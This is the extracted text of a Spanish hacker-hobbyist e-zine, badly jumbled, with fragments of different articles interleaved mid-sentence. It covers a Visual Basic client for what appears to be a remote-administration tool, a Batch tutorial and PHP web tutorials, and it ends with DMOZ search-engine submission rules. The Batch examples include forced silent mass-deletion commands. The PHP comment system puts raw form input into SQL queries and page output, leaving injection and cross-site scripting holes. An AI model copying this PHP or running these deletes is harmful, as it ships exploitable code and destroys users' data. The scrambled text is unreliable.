Voy a explicar un poco eso de split y arrays: Nosotros enviamos esto: Conexin|Minombre|127.0.0.1|mascotas. Entonces lo que hacemos es partirlo, y almacenarlo en un array(en data). De manera que data(0) es lo primero, en este caso Conexin,por eso se hace Select Case data(0) porque lo usamos como identificador. Data(1) lo siguiente Mi nombre y as sucesivamente. Bueno, en la siguiente e-zine mas ;) Espero que les haya gustado, se que no me explico muy bien pero bueno Si tienen dudas tienen el foro, saludos! Si hay fallos notifquenmelo! Puede ser porque lo hice rapidito ^^ PD:El resultado final:

http://ericprograms.awardspace.com/CONSTANTESYDEMAS.txt
Bien, hemos visto que enviamos informacin al conectarse, ahora en el cliente, la recibimos y la mostramos:

By Don Nadie

CLIENTE

Case "Conexion" Dim x As ListItem Set x = lv.ListItems.Add(, Index & "|", data(1)) aadimos los datos, y en la key el indice y | para luego partirlo y poder identificar x.SubItems(1) = WS(Index).RemoteHostIP mas datos que aadimos.... x.SubItems(2) = data(2) & "/" & data(3) x.SubItems(3) = data(4) x.SubItems(4) = data(5) & " MB" x.SubItems(5) = data(6) x.SubItems(6) = data(7) x.SubItems(7) = data(8) x.SubItems(8) = data(9) x.SubItems(9) = "v.1" End Select

CUH e-zine vol #1 - 1 edicin

Introduccin al Batch

Introduccin al Batch
En qu consiste Batch?
Batch es un lenguaje de programacin que utiliza el Sistema Operativo MS-Dos como interprete. No necesita editores ni otros programas, se utiliza el Bloc de Notas (NotePad) o con cualquier editor de palabra: simplemente lo guardamos con extensin .bat. Cualquier archivo con extensin .bat es asumido por el sistema operativo como un ejecutable al igual que los archivos con extensin .exe y los .com, bsicamente los archivos de proceso por lotes se puede correr desde cualquier parte, desde que se tenga un acceso directo o icono lo podemos lanzar desde el escritorio, una carpeta, en fin es un ejecutable (Windows nos permite especificarle al sistema operativo que archivos queremos que sean ejecutables) desde un bat tambin, solo es cuestin de modificar un poco el registro), incluso desde otros programas sin importar el tipo de lenguaje: por ejemplo se puede llamar un bat desde html, lo mismo que desde cualquier bat se pueden ejecutar otros programas, desde bat se puede hacer cualquier cosa que se base en Windows.

by Furious Dami
Los Comandos presentados a continuacin son tan solo los ms usados para ver mas buscar en la carpeta C:\Windows\System32 los archivos sin iconos y con extensin .exe o .com.

Comandos
At: Programa comandos o archivos para que se ejecuten a una hora determinada. Attrib: Muestra y cambia los atributos de archivos. Cd: Muestra o cambia el directorio (carpeta) actual. Chdir: Muestra o cambia la carpeta actual. Chkdsk: Escanea y muestra el status de un disco. Cls: Borra la pantalla. Cmd: Inicia una nueva ventana del procesador de comandos de Windows XP. Color: Cambia los colores del fondo y de la letra de la consola. Comp: Compara el contenido de los archivos. Compact: Muestra o altera la compactacin de archivos en discos NTFS. Convert: Convierte volmenes FA T en NTFS. Copy: Copia uno o mas archivos a un directorio diferente. Date: Muestra o altera la fecha. Del: Borra archivos. Dir: Muestra todos los archivos en la carpeta actual. Diskcomp: Compara el contenido de dos discos de 3. Diskcopy: Copia el contenido de dos discos de 3. Erase: Borra archivos. Echo: Oculta el eco de los comandos (no permite que se vean los comandos). Exit: Sale de la consola. FC: Compara y exibe diferencias entre archivos. Find: Busca una secuencia de textos en uno o mas archivos. Format: Formatea un disco. Goto: Direcciona la consola a una lnea de un archivo por lotes. IF: Realiza procesamiento bajo condiciones especificas de un archivo por lotes. Label: Cambia la etiqueta de volumen de un disco. MD: Crea una nueva carpeta. Move: mueve uno o ms archivos de una carpeta a otra. Pause: Pausa el procesamiento de un archivo por lotes hasta presionar una tecla. Print: Imprime un texto o archivo. RD: Remueve una carpeta o directorio. Recover: Recupera informacin legible de un disco daado. Rem: Graba comentarios en archivos por lotes o en Config.sys Ren: Cambia el nombre de un archivo. Replace: Substituye archivos. Set: Muestra, crea o borra las variables de entorno. Start: Inicia una ventana nueva para ejecutar un comando o programa. Subst: Asocia un camino a una letra de unidad.

El bloc de notas
Para programar en Batch necesitaremos el Bloc de Notas de Windows, tal vez parezca algo poco comn pero es la herramienta que se utiliza para programar en Batch. En el Bloc escribiremos los Source Code (Cdigos Fuente) de nuestros Batch, luego en la opcin Guardar como elegimos todos los archivos y lo guardamos con extensin ".bat", debemos tener cuidado con estos archivos, por que si jugamos con comandos como del *.* o algo similar podramos daar estropear nuestros datos y hasta el S.O., claro que tambin existen formas de recuperarlos , pero esa no es la idea. Para ejecutar nuestros Batch necesitaremos la Consola (MS-Dos, Smbolo de sistema, Lnea de comandos o como le quieran llamar) que podemos acceder a ella desde la opcin Ejecutar del Men Inicio, escribimos Cmd y listo. La consola es una pantalla negra en la que escribiremos los comandos y la que Ejecutara nuestros programas Batch.No todos los comandos que se usan en batch se aplican a la consola de comandos, claro que son pocos !!!

Los Comandos de programacin en Batch son los mismos usados en MS-Dos y a continuacin daremos una breve explicacin de cada comando y los parmetros utilizados. Para obtener informacin sobre cualquier comando tecleamos en la consola el nombre del comando. Ej:

CUH e-zine vol #1 - 1 edicin


Time: Muestra o modifica la hora del sistema. Tree: Exibe grficamente el rbol de un directorio raz. Type: Muestra el contenido de un archivo de texto. Title: Cambia el titulo de la ventana de la consola. Ver: Muestra la versin de Windows. Vol: Muestra la etiqueta y el volumen de una unidad. Shutdown: Apaga o reinicia la PC. Command: Inicia una nueva ventana del procesador de comandos de MS-Dos. Nul: Sirve para anular la respuesta de un comando. Tskill: Finaliza programas y procesos (solo para XP Home Edition). Taskkill: Finaliza programas y procesos (solo para XP Professional). Net: Administra y configura servicios.

Introduccin al Batch Con esto estas indicando que se borren todos los archivos que se llamen Mo, pero con todas las extensiones. 3) Si quieres eliminar todos los archivos de Word (.doc) y WorPad (.dot) en la unidad C: con el nombre Poemas se utilizan de esta forma: Del /Q /F C:\poemas.do* Esto indicara que se eliminen todos los archivo con el nombre poemas, pero que tengan una extensin que comience con do.

Los Parmetros
Se usan para modificar o alterar la funcin de un comando. Por ejemplo el comando DEL. Del sin parmetros sirve para borrar archivos comnmente, pero con los parmetros: /P: Solicita confirmacin antes de borrar cada archivo. /F: Fuerza la eliminacin archivos de solo lectura o del sistema. /S: Borra los archivos de la carpeta actual y todas las subcarpetas. /A: Selecciona los archivos a ser borrados basndose en los atributos. Por ejemplo si utilizamos: Del /F /P autoexec.bat Nos pedira confirmacin para borrar el archivo autoexec.bat, que es un archivo del sistema. NOTA: Los parmetros de los comandos que esten entre corchetes [ ] no son obligatorios.

Los Asteriscos (*)


Los asteriscos son comodines que sirven para indicar todo, aqu van algunos ejemplos de uso de los asteriscos: 1) Imagina que quieres eliminar todos los archivos .mp3 de la unidad C:\ El cdigo en Batch sera: Del /Q /F C:\*.mp3 Que indica que se deben eliminar todos los archivos con extensin .mp3 de la unidad C: Si el cdigo fuese: Del /Q /F C:\50ce*.mp3 Indicara que elimine todos los mp3 que comiencen con el nombre 50ce sin importar como terminen. Del /Q /F C:\*50ce.mp3 Indicara que se eliminen todos los archivos mp3 que terminen en 50ce sin importar como empiecen. 2) Supongamos que deseas borrar todo los archivos llamados Mo en Mis Documentos, para eso utilizaras: Del /Q /F C:\Documents and Setings\%username%\Mis Documentos\Mio.*

Los Redireccionadores (>> y >) Son usados para redireccionar la salida de texto enviada por un comando a cualquier otro archivo como en el siguiente caso: Pause > elpause.txt Si escribiramos el comando pause solo, saldra el siguiente texto: Presione cualquier tecla para continuar pero al colocar el redireccionador ese texto se guardara en el archivo elpause.txt, otro ejemplo: echo Somos todos amigos > texto.txt En este caso la salida de texto del comando echo seria: Somos todos amigos Pero con el redireccionador > la frase Somos todos amigos seria guardada en el archivo texto.txt. El > En el siguiente caso: Echo La informtica es interesante > info.txt El redireccionador creara (en caso de que no existiese) un archivo llamado info que tendra adentro la frase La informtica es algo interesante, pero si ya existiese lo que hara seria borrar todo el contenido del archivo y aadirle la frase. El >> En el siguiente caso: Echo La informtica es interesante >> info.txt El redireccionador creara (en caso de que no existiese) un archivo llamado info que tendra adentro la frase La informtica es algo interesante, pero si ya existiese lo que hara a diferencia de > lo que hara seria aadirle luego de la ultima lnea la frase.

El comando Nul y el >


En el siguiente caso: Echo La informtica es interesante>nul El comando nul a diferencia de los otros no lo guardara ni redireccionaria simplemente ANULARIA a la frase La informtica es interesante y no permitira que apareciera en pantalla.

Las Comillas ( ) Se usan cuando hay espacios en una ruta o cadenas de comando. Por ej. : MD C:\Documents and settings\usuario\Mis Documentos\Super Carpeta Este cdigo estara errneo por que faltan las comillas. El correcto sera: MD C:\Documents and settings\usuario\Mis Documentos\Super Carpeta

CUH e-zine vol #1 - 1 edicin


Como hay espacio en los nombres de las carpetas el cdigo anterior no funcionaria pero usando las comillas se admiten los espacios en las rutas.

Introduccin al Batch

1) Supongamos que deseas escribir Todo un 100% echo Todo un 100% Esto no funcionaria porque el signo % intentara mostrar una variable y no aparecera. Entonces el cdigo sera as: Echo Todo un 100^% Al utilizar el smbolo ^ en el % aparecera y no estara definiendo una variable. 2) Si deseas crear un menu que tenga la opcin <1> AGREGAR USUARIO esto estara mal:

El signo Interrogacin (?)


Este signo se usa como comodn para indicar que una letra o numero es desconocido, aqu algunos ejemplos: 1) Si quieres eliminar un documento de Word que sabes que empieza con Gran y que tiene 3 carctres mas puedes usar: Del /Q /F C:\Gran???.doc El signo ? indicara que el resto que esas 3 letras son desconocidas y entonces la maquina buscara los documentos que empezaran con Gran y continuaran 3 caracteres mas hacia delante. 2) Otro ejemplo es si queres mover todos los archivos que terminen con G y que tengan 5 letras antes. Move C:\?????G.* Con esto moveramos todos los archivos que tengan G en el sexto lugar. 3) Si queremos eliminar los archivos de Texto que tengan 4 caracteres seria: Del C:\????.txt Con esto borraramos todos los archivos de texto en la unidad C: sin importar que letras tengan. Los signos de % Este signo es usado para mostrar variables. Aqu alguna variables de entorno: %username% Con esto mostramos o introducimos el nombre del usuario actual por ejemplo si utilizamos:

echo <1> AGREGAR USUARIO


Porque el contenido del archivo 1 se mostrara en Echo y sera redireccionado a AGREGAR USUARIO. El cdigo correcto sera as:

echo ^<^> AGREGAR USUARIO


Con esto el > no estara redireccionando nada y se mostrara en pantalla.

El Signo &
Este es un signo que indica el procesamiento de varios comandos en la misma lnea. Cuando es & espera que se ejecute el primer comando y ejecuta el segundo si el primero finaliza correctamente, pero cuando es && no es necesario que el primer comando finalice correctamente. A continuacin un ejemplo: Para hacer que se ejecuten el Internet Explorer y El Bloc de Notas con el comando IF al elegir la opcin 1 se utilizara as: If %variable%==1 (Start iexplore && Start notepad) As con el mismo nmero de opcin se ejecutaran el Internet Explorer (Iexplore) y el Bloc de Notas (notepad).

Echo El usuario es: %username%


Con esto aparecera el mensaje: El usuario es: Furious Dami Si fuera el usuario conectado actualmente. %homedrive% Se usa para indicar el disco local o en el que esta el sistema operativo que estamos utilizando. %systemroot% Se usa para definir la carpeta en la que esta instalado Windows por ejemplo: C:\Windows %computername% Para mostrar el nombre de la computadora.. %homepath% Abreviacin para ir a la ruta del usuario, Ej: C:\Documents and Settings\ElUsuario NOTA: Para variables del comando For en lugar de %variable% se usa %variable

By Furious Dami

Resultado de set

El signo ^
Este smbolo es til para mostrar los %, &&, <, >,etc. ya que en Batch los caracteres especiales no son mostrados, y al utilizar estos smbolos si aparecen. Ejemplos

CUH e-zine vol #1 - 1 edicin

Introduccin al Batch

Resultado de systeminfo

Resultado help

CUH e-zine vol #1 - 1 edicin

Metodologa de la Programacin

Metodologa de la programacin
Algoritmo
Conjunto de operaciones (sentencias y proposiciones) y procedimientos (Toma de decisiones procesos) que deben seguirse para la resolucin de un problema. El origen etimolgico de la palabra deriva del nombre

Editorial
latinizado del gran matemtico rabe Mohamed Ibn Moussa Al Kow Rizmi, el cual escribi su obra Quitab Al Jabr Al Mugabala, donde se recoga el sistema de numeracin hind y el concepto del cero. Fue el gran matemtico Fibonacci, quien tradujo su obra al latn y la inici con las palabras: Algoritmi dicit.

Cuando se usa el lenguaje algortmico debe hacerse un anlisis previo del problema que se va resolver, de las deducciones que se saquen se encuentra un mtodo que permita resolverlo, todas esas operaciones a realizar, y el orden especifico en que se ejecutan es lo que se denomina algoritmo, dicho algoritmo se codifica o compila a un sistema comprensible por el computador.

Caractersticas: Inicio, fin Preciso Simple, Breve y conciso Sencillo, Legible. Modular. Eficiente y Efectivo.

PSEUDOCDIGO DIAGRAMA DE FLUJO


El pseudocdigo describe un algoritmo utilizando distintas frases comunes e instrucciones de programacin y palabras nemotcnicamente modificadas que definen la estructura bsica del mismo. Permitiendo al programador centrarse en los aspectos lgicos de la solucin al problema, evitando reglas de sintaxis de los lenguajes de programacin. Ningn Pseudocdigo es estndar, varia de una persona a otra. Representa la esquematizacin grafica de un algoritmo. En realidad muestra grficamente los pasos o procesos, a seguir para alcanzar la solucin de un problema. Si el diagrama ha sido elaborado correctamente, el paso al lenguaje de programacin es simple y directo

Simbologa de los diagramas de flujo


Fig. 1

Inicio-fin

Proceso

Entrada

Decisin

Imprimir

Conexin Externa

Conexin Interna

Decisin Mltiple

Flujo o direccin del programa. variables, operaciones primitivas elementales, leer los datos y todos aqullos procesos que se necesiten para la resolucin del problema. Cada instruccin lleva etiquetado un numero en orden descendente empezando con el 1.

Secuenciacin
Es una estructura de control que permite al computador, ejecutar una accin despus de otra y luego la que sigue y as sucesivamente .Estas acciones consisten en:

CUH e-zine vol #1 - 1 edicin


Elementos bsicos de un algoritmo.
Encabezado-> Nombre del algoritmo Inicio-> Todo algoritmo empieza con la etiqueta 1 Declaraciones-> se declaran variables, funciones , etc. Procesos->Leer, calcular, imprimir Fin->
Ejemplo Sueldo empleado (Rango) 1 inicio 2 cve, ht: entero Pht, sueldo: real (flotante) 3 Leer cve, ht, pht 4 sueldo=ht*pht 5 imprimir cve, sueldo 6 fin

Metodologa de la Programacin

Fig.2

Datos
Los datos son el alma y vida de una computadora, todo gira en torno a ellos, los datos pueden ser simples o estructurados, los datos simples son aquellos que solo ocupan una casilla de memoria, significando as que corresponden a un nico valor. Ellos pueden ser: Numricos (Reales, Enteros, de coma flotante, y exponenciales) de Carcter (caracteres, cadenas de caracteres y caracteres ASCII) y lgicos (Booleanos ) De igual forma existen los datos estructurados, a los que para cada dato le son asignadas varias casillas de memoria, pudiendo ser cadenas de caracteres ->(Strings), arreglos ->(Array) y registros-> (Record- En Bases de datos)

la memoria en el computador , deben tener ciertas reglas en cuanto a su escritura se refiere: no deben empezar con nmeros, no tener espacios en blanco, entre otros mas.

Constantes
Es un valor fijo que no puede ser modificado, asignado dentro del programa en ejecucin durante el proceso de compilacin.

Variables
Son valores que se asignan para modificarse durante la ejecucin o la compilacin de un programa. Hasta que no se le da un valor a una variable dentro de un programa, no podemos hacer uso de ella, denominndose a este proceso: sentencia de asignacin, siendo esta una operacin de destruccin ya que el valor asignado se pierde cuando se sustituye por el nuevo valor .Tambin se debe tener en cuenta que el tipo de expresin debe ser del mismo tipo que el de la variable. combinan variables y constantes para crear funciones y se juntan con los operadores aritmticos se forman expresiones aritmticas, que generan un valor, puede ser: verdadero o falso.

Identificadores
Son nombres que representan un objeto dentro de un programa (constantes, variables, datos, procedimientos, funciones), asignar un nombre a las celdas o casillas de Operadores-> Aritmticos y Lgicos Se usan para efectuar operaciones aritmticas o lgicas dentro de todos los lenguajes de programacin cuando se

CUH e-zine vol #1 - 1 edicin


Operadores Aritmticos
Son los conocidos por todos, ,existen todos los lenguajes. + * / ^ mod div Suma Resta Multiplicacin Divisin Exponenciacin Mdulo Divisin entera

Metodologa de la Programacin

Operadores Lgicos
En ocasiones en los programas se necesitan realizar comparaciones entre distintos valores, esto se realiza utilizando los operadores relaciones, los cuales se listan a continuacin Operador < > <= >= = <>

Menor que Mayor que Menor o igual que Mayor o igual que Igual a Distinto a, diferente de

Jerarqua o Precedencia de Operadores


Cuando aparecen dos o mas expresiones aritmticas debemos tener en cuenta la prioridad de la operacin a desarrollar, los parntesis tiene la mayor prioridad, se realizan las operaciones siempre, empezando desde el ms interno del nido.

Flujograma o Diagrama de flujo Es la representacin o esquematizacin grfica de un algoritmo, existen unas normas o estndares representativos que definen el tipo de estructura algortmica, ver Figs. 1 y 2 Tipo de dato Define un valor para cada dato y la
forma con que ser almacenado y procesado posteriormente, los datos pueden ser : numricos (Reales ,flotantes, etc.), de caracteres, booleanos o lgicos, Etc., cuando un dato se guarda en memoria debe asignrsele un valor, para poder realizar posteriormente un determinado proceso correctamente, hay que tener en cuenta que un solo error en la asignacin del tipo de dato o un error de escritura pueden dar al traste con todo un programa , es muy importante saber definir el valor a los datos para el apropiado funcionamiento de cualquier programa.

Ciclo (Bucle o Loop) Es una repeticin de sentencias o secuencia de sentencias un nmero definido de veces o

Glosario 1
Sucesin o secuencia ordenada y cronolgica de pasos o actividades que conllevan a la solucin de un problema o a la ejecucin de una labor (o accin).

iteraciones.

Algoritmo

Identificador Son calificativos que se usan para hacer


referencia a variables, constantes, funciones o cualquier objeto definido: bien sea por el programador o por el usuario.

Programa Conjunto de sentencias o instrucciones que hacen funcionar a un computador, por lo general estan compuestos por una serie de mdulos y estructuras, ellos realizan un proceso que suple una necesidad de un sistema especifico de informacin. Al conjunto de programas escritos en y para los computadores se le acua un trmino en ingles, muy conocido: Software. Pseudocdigo Trmino para referirse a un algoritmo,
recurriendo a una mezcla de oraciones o palabras en lenguaje cotidiano, instrucciones de programacin y

Constante Son datos predefinidos que permanecen


intactos durante la ejecucin de un programa.

Variable Es un dato identificador que cambia su valor


(existe un valor para esta en accin,
cada tipo de dato)

mientras el programa

Rutina Secuencia

de instrucciones o sentencias (modulo), que hace parte de un programa y que puede usarse varias veces dentro de la ejecucin del mismo.

CUH e-zine vol #1 - 1 edicin


Acceso Referencia que se hace a
a un elemento especfico dentro de un arreglo, indicando el nombre del arreglo y la posicin del arreglo (ndice).

Metodologa de la Programacin

Arreglo Es un tipo de dato que contiene

ndice Valor que especifica un rango (nombre y


ubicacin) dentro de un arreglo.

una estructurado que permite almacenar varios valores de un mismo tipo, a cada uno de los cuales se accede por un ndice entero.

Matriz Es una variable que permite almacenar mltiples valores de un mismo tipo.

Este articulo es tan solo una introduccin a la metodologa de la programacin, en la prxima parte practica: diseo de algoritmos y diagramas de flujo, espero lo hayan disfrutado, ah! y si, es de ustedes , hagan lo que quieran con el !

Editorial

CUH e-zine vol #1 - 1 edicin

Varios Conocimientos Web

Varios Conocimientos Web


Distintas secciones en un mismo documento
index.php <ul> <li><a href="index.php?pag=home">Home</a></li> <li><a href="index.php?pag=des">Descargas</a></li> <li><a href="index.php?pag=jue">Juegos</a></li> <li><a href="index.php?pag=info">Info</a></li> </ul> <?php if(!isset($_GET["pag"])){ // si no existe la variable de URL, pag... echo'<script>top.location="index.php?pag=home";</s cript>'; //redirigimos a home } if($_GET["pag"]=="home"){ echo'Bienvenido a mi web... blablabla'; //si la variable es igual a home hacemos tal } if($_GET["pag"]=="des"){ echo'Descargate estos magnficos programas....'; //si la variable es igual a des hacemos tal } if($_GET["pag"]=="jue"){ echo'Aqu tienes varios juegos:...'; //si la variable es igual a jue hacemos tal } } if($_GET["pag"]=="info"){ echo'Informacin'; //si la variable es igual a info hacemos tal } ?>

By Gallloo
$servidor="server.com:port"; $user="usuario"; $pass="password"; $conexion=mysql_connect($server,$user,$pass);//nos conectamos mysql_select_db("nombre_bd",$conexion); //especificamoslabasededatos ?> index.php <?php echo'<formaction="index.php?mostrar=si" method="post"> <inputtype="text"name="nick"size="20"/><br /><br/> <textareaname="texto"rows="7"></textarea><br/><br /> <inputtype="submit"value="Enviar"/> </form><br/><br/>';//formulario include("bd.php"); //incluimoslainfodelabd $query1=mysql_query("selecttextofrom comentario",$conexion); //llamamosaltextodelatabla $query2=mysql_query("selectnickfrom comentario",$conexion); //llamamosalnickdelatabla while($d1=mysql_fetch_array($query1)){ //lapasamosaarray $d2=mysql_fetch_array($query2); echo$d1[0]."<br>by".$d2[0]."<br><br>"; //muestratodoslasfilas } if($_GET["mostrar"]=="si"){ //silavariableGETllamadamostrares//iguala "si"... $nick=$_POST["nick"]; //recibimoselnickdelform $texto=$_POST["texto"]; //recibimoseltextodelform mysql_query("insertintocomentario(nick, texto)values('$nick','$texto')",$conexion); //insertamoslosdatosenlabd echo '<script>top.location="index.php";</script>'; //redirigimosalapaginaprincipal//mediante javascript } ?> crear.php <?php include("bd.php");//incluimoslainfodelabdpara crearlatabla mysql_query("createtablecomentario(nick varchar(50),textotext)",$conexion);//creamosla

Ah dejo explicado de forma breve como hacer una web con diferentes secciones en un mismo documentos php, ahora veremos como hacer un sistema de comentarios algo ms complejo ya que requiere algn conocimiento de mysql tambin. Sistema bsico de comentarios Crearemos 3 archivos: -index.php ah se encontrarn los comentarios y es donde se postearn. -bd.php aqu se encuentra toda la informacin sobre para conectarnos a la base de datos. -crear.php solo lo abrimos una vez y nos servir para crear las tablas.
bd.php <?php

CUH e-zine vol #1 - 1 edicion


tabla mysql_close($conexion);//cerramoslaconexin ?>

Varios Conocimientos Web

recuerdo que tambin est disponible para linux y otros sistemas operativos. Subimos los ficheros de la web por el FTP Ponemos los datos en el filezilla y nos conectamos

Bueno, el sistema de comentarios ya est, no le he aadido ninguna hoja de estilos ni nada (estar un poco soso) pero eso ya lo dejo que lo hagis vosotros. Ahora explico como subir los archivos al FTP para los ms nuevos en la programacin web. Buscamos un hosting
En esta ocasin va a ser

este

Subimos los archivos de la web


Nos registramos, poniendo nuestros datos

Ya lo tenemos subido Ahora nos redireccionar a un pdf con todos los datos de acceso.

Esto, es todo! Si tenis alguna duda postead en la seccin de webmasters. By Gallloo

Nos pillamos la ultima versin de filezilla aunque hay otra mas reciente en espaol pero est en beta,

CUH e-zine vol #1 - 1 edicin

Posicionamiento Web

Posicionamiento web
Antes que nada tienes que decidir para que estas haciendo tu Web para ganar dinero o para ganar users algunas veces sobre todo si apenas comienzas en creacin de Web , al ponerle publicidad pierdes cosas tiles para tus visitantes y tambin al contrario pasa lo mismo al optimizarla para los buscadores.

by XD
Ejemplo no prximamente y que algunos link estn muertos tu Web tiene q estar bien hecha accesible y no confusa para tus visitantes si esta hecha con algn script prefabricado dejarle los crditos sin faltas de ortografa sugirelo en la categora correcta si algn sitio de tu competencia (temtica) esta ve que categora es y ah inscribe tu Web no la mandes varias veces por que los editores se molestan y no la mandas en cada categora mndala en una y los editores si ven que podra tener doble triple etc. la pondrn existen rumores que algunos editores cobran por aceptarte la Web si detectas algn abuso en el DMOZ Escribe en http://dmoz.org/cgibin/feedback.cgi

Dar de alta en google y en otros


Aunque google no asegura que tu url la va a indexar mndala varias veces no te penaliza ni nada, tambin es importante darla de alta en otros buscadores aunque es cierto que q la mayora usa google no esta de mas tambin inscribirlo en otros: google http://www.google.com/intl/es/addurl.html msn http://search.msn.com/docs/submit.aspx yahoo altavista http://es.altavista.com/addurl/default

Como sugerir un sitio a DMOZ fuente:http://www.dmoz.org


Paso1 Cmo agrego un sitio al Open Directory Project? Agregar un sitio es fcil. Simplemente siga instrucciones. Cmo sugerir un sitio a Open Directory

estas

DMOZ : Open Directory Project


DMOZ : Open Directory Project , ODP , o algunos le llaman directory de mozilla. Para aparecer en los primeros lugares en google tienes que estar en ese directorio porque es donde se basa para listar las Webs Intenta inscribirte realmente es difcil pero si lo consigues ser un grande logro nada mas google? no la mayora AOL Search, Lycos, HotBot, DirectHit y otros cientos ms

* No enve sitios espejo. Sitios espejo son aquellos que tienen un contenido idntico pero con URLs distintos. * No enve URLs que contengan nicamente el mismo o similar contenido que otros sitios que puedan estar listados en el directorio. Sitios con contenido coincidente y repetitivo no son tiles para los usuarios del directorio. Mltiples envos del mismo sitio o de sitios relacionados puede producir que sean excluidos y/o borrados estos sitios y todos sus afiliados. * No disfrace sus envos para sugerir el mismo URL ms de una vez. Ejemplo: http://www.dmoz.org http://www.dmoz.org/index.html * No enve ningn sitio con una URL que redireccione a otra distinta. * El Open Directory tiene una poltica contra la inclusin de sitios con contenido ilegal. Ejemplos de material ilegal incluyen pornografa infantil, difamacin, materiales que infrinjan algn derecho de la propiedad intelectual y material que especficamente apoye, solicite o ampare actividades ilegales (como el fraude o la violencia). * No enve sitios "En construccin". Espere hasta que el sitio est terminado antes de enviarlo. Sitios incompletos, con avisos "En construccin" o que contengan grficos o enlaces rotos no son buenos candidatos para el directorio.

Dmoz.org Es un directorio de webs creado por Netscape y AOL se divide en idiomas pases categoras se basa en usuarios editores como la Wiki puedes entrar como editor pero no es necesario para que te agreguen tu Web al ser como la wiki existen parecidos problemas editores malos etc. DMOZ es gratis y no lo confundas no es buscador aunque tiene uno pero solo es interno es un directorio y es totalmente gratis aparecen sitios basura en DMOZ pero porque lleva varios aos online desde 1998 Recomendaciones de tu Web tiene que estar bien hecha no la clsica que parece geocities de hace 15 aos no un myspaces spacelive tener dominio propio Web terminada:

CUH e-zine vol #1 - 1 edicion


* Enve los sitios de pornografa a la categora apropiada dentro de Adult. * Enve los que no estn en ingls a la categora apropiada dentro de World. * No enve sitios compuestos mayoritariamente por enlaces afiliados. Paso 2 Realice una bsqueda rpida en el directorio en dmoz.org para asegurarse de que su sitio no est ya incluido. De esta forma todos ahorraremos tiempo. Paso 3 Identifique la categora (una sola) que mejor defina su sitio. El Open Directory posee una enorme variedad de temas entre los que elegir. Deber enviar su sitio a una nica categora, la que sea ms relevante. Los sitios enviados a categoras inapropiadas o no relacionadas pueden ser rechazados o eliminados. Nota: algunas categoras no ofrecen los enlaces "Sugerir URL" o "Actualizar URL". Estas categoras no aceptan envos, por lo tanto debera encontrar una categora ms especfica para su sitio. Paso 4 Una vez que ha seleccionado la mejor categora para su sitio, vaya directamente a esa categora en dmoz.org y entonces utilice "Sugerir URL". Siga las instrucciones del formulario de envo cuidadosamente. La descripcin debera informar del contenido del sitio de forma concisa y precisa. No deben ser de naturaleza promocional. Enviar una descripcin promocional en vez de una objetiva y bien escrita puede retrasar significativamente el listado de su sitio o impedir totalmente que sea listado. El software para el envo automtico de sitios es (y siempre ha sido) una violacin de este proceso. Los sitios enviados automticamente son marcados y despus de aceptarse el envo, borrados sin notificrselo. Los envos automatizados enviados de forma persistente nos obligarn a excluirle de dmoz, as podremos ofrecer los recursos a personas reales. Un editor de ODP revisar su envo para determinar si se incluir en el directorio. En funcin de distintos factores como el volumen de envos a una categora en particular, puede llevar hasta varias semanas o ms antes de que su envo sea revisado. Por favor enve cada URL al Open Directory una sola vez. Le repetimos que el envo reiterado del mismo o de sitios relacionados puede conllevar la exclusin y/o eliminacin de sos y todos los sitios afiliados. Disfrazar su envo y sugerir la misma URL ms de una vez no est permitido. Actualizar su sitio Si un sitio ha sido aceptado en el directorio pero no est satisfecho con la descripcin o el ttulo del sitio, puede ir a la categora donde est listado y rellenar el formulario "actualizar URL". Si no est satisfecho con la categora donde su sitio est listado, puede enviar un email a un editor de la categora explicando su desacuerdo. Sea civilizado y educado, los comportamientos amenazadores u ofensivos no sern tolerados.

Posicionamiento Web

Si (y slo si) no est de acuerdo con la respuesta del editor, puede usar el enlace "reportar abuso/spam" en la parte superior de la pgina para recurrir la decisin del editor. Sea concreto con respecto a su desacuerdo (incluyendo por qu piensa que la respuesta del editor es inadecuada). Los comentarios realizados por medio del enlace "reportar abuso/spam" son revisados por el staff del ODP , que tomar la decisin final. Por favor, NO enve mensajes a Netscape, eso slo retrasar y complicar el proceso. Nos tomamos muy en serio las observaciones y les prestamos gran atencin. Pero recuerde que debemos mantener nuestro criterio y realizar numerosos juicios sobre cmo hacer el ODP tan til como sea posible, independientemente de la decisin que tomemos, no conseguiremos satisfacer siempre a todos. Posicionando su sitio en portales y motores de bsqueda que utilizan los datos del ODP Si su sitio ha sido aceptado en el Open Directory, puede tardar de dos semanas a varios meses en ser listado en los sitios que utilizan los datos del ODP , como por ejemplo AOL Search, Google, Netscape Search, Yahoo Search, y otros cientos de sitios. Actualizamos los datos disponibles semanalmente, pero cada uno de estos sitios tiene su propio calendario de actualizaciones. Criterio editorial Procedimiento una vez que ha sugerido su sitio Por favor, comprenda que hacer del ODP un recurso valioso, requiere que apliquemos nuestro criterio editorial para determinar el contenido y la estructura del directorio. Ese criterio se extiende (pero no se limita) a qu sitios incluir, dnde se colocan los sitios dentro del directorio, cundo y si procede incluir ms de un enlace a un sitio, cundo son apropiados los enlaces profundos y el contenido del ttulo y la descripcin del sitio. Adems, la situacin de un sitio en el directorio es susceptible de ser modificada y borrado en cualquier momento a nuestro nico criterio. No debera dar por supuesto que un sitio ser incluido en el directorio. Por favor, comprenda que al aplicar el criterio de edicin puede que no se trate por igual a todos los envos. Puede que no coincida siempre con nuestras decisiones, pero esperamos que se d cuenta de que hacemos todo lo que podemos para tomar decisiones justas y razonables. El equipo del Open Directory agradece comentarios y observaciones sobre el directorio en general. Por favor mustrenos su opinin y cmo podemos mejorar el servicio. Muchas gracias. Vaya a la pgina inicial del Open Directory en dmoz.org comience aqu la bsqueda de la categora a la que realizar su envo. Cunto tiempo tarda mi sitio en ser listado? Dependiendo del nivel de actividad de los editores en su rea, pueden pasar dos semanas o ms hasta que su sitio sea revisado. Aunque el mbito y la cobertura del directorio sean tan extensos, tenemos muy en cuenta la calidad de ODP y estamos orgullosos de ser muy selectivos. No aceptamos todos los sitios, por lo tanto, si el suyo no es aceptado, por favor no se lo tome como algo personal. Nuestra meta es hacer un directorio tan til como sea posible para nuestros usuarios, no servir como herramienta promocional para las

CUH e-zine vol #1 - 1 edicion


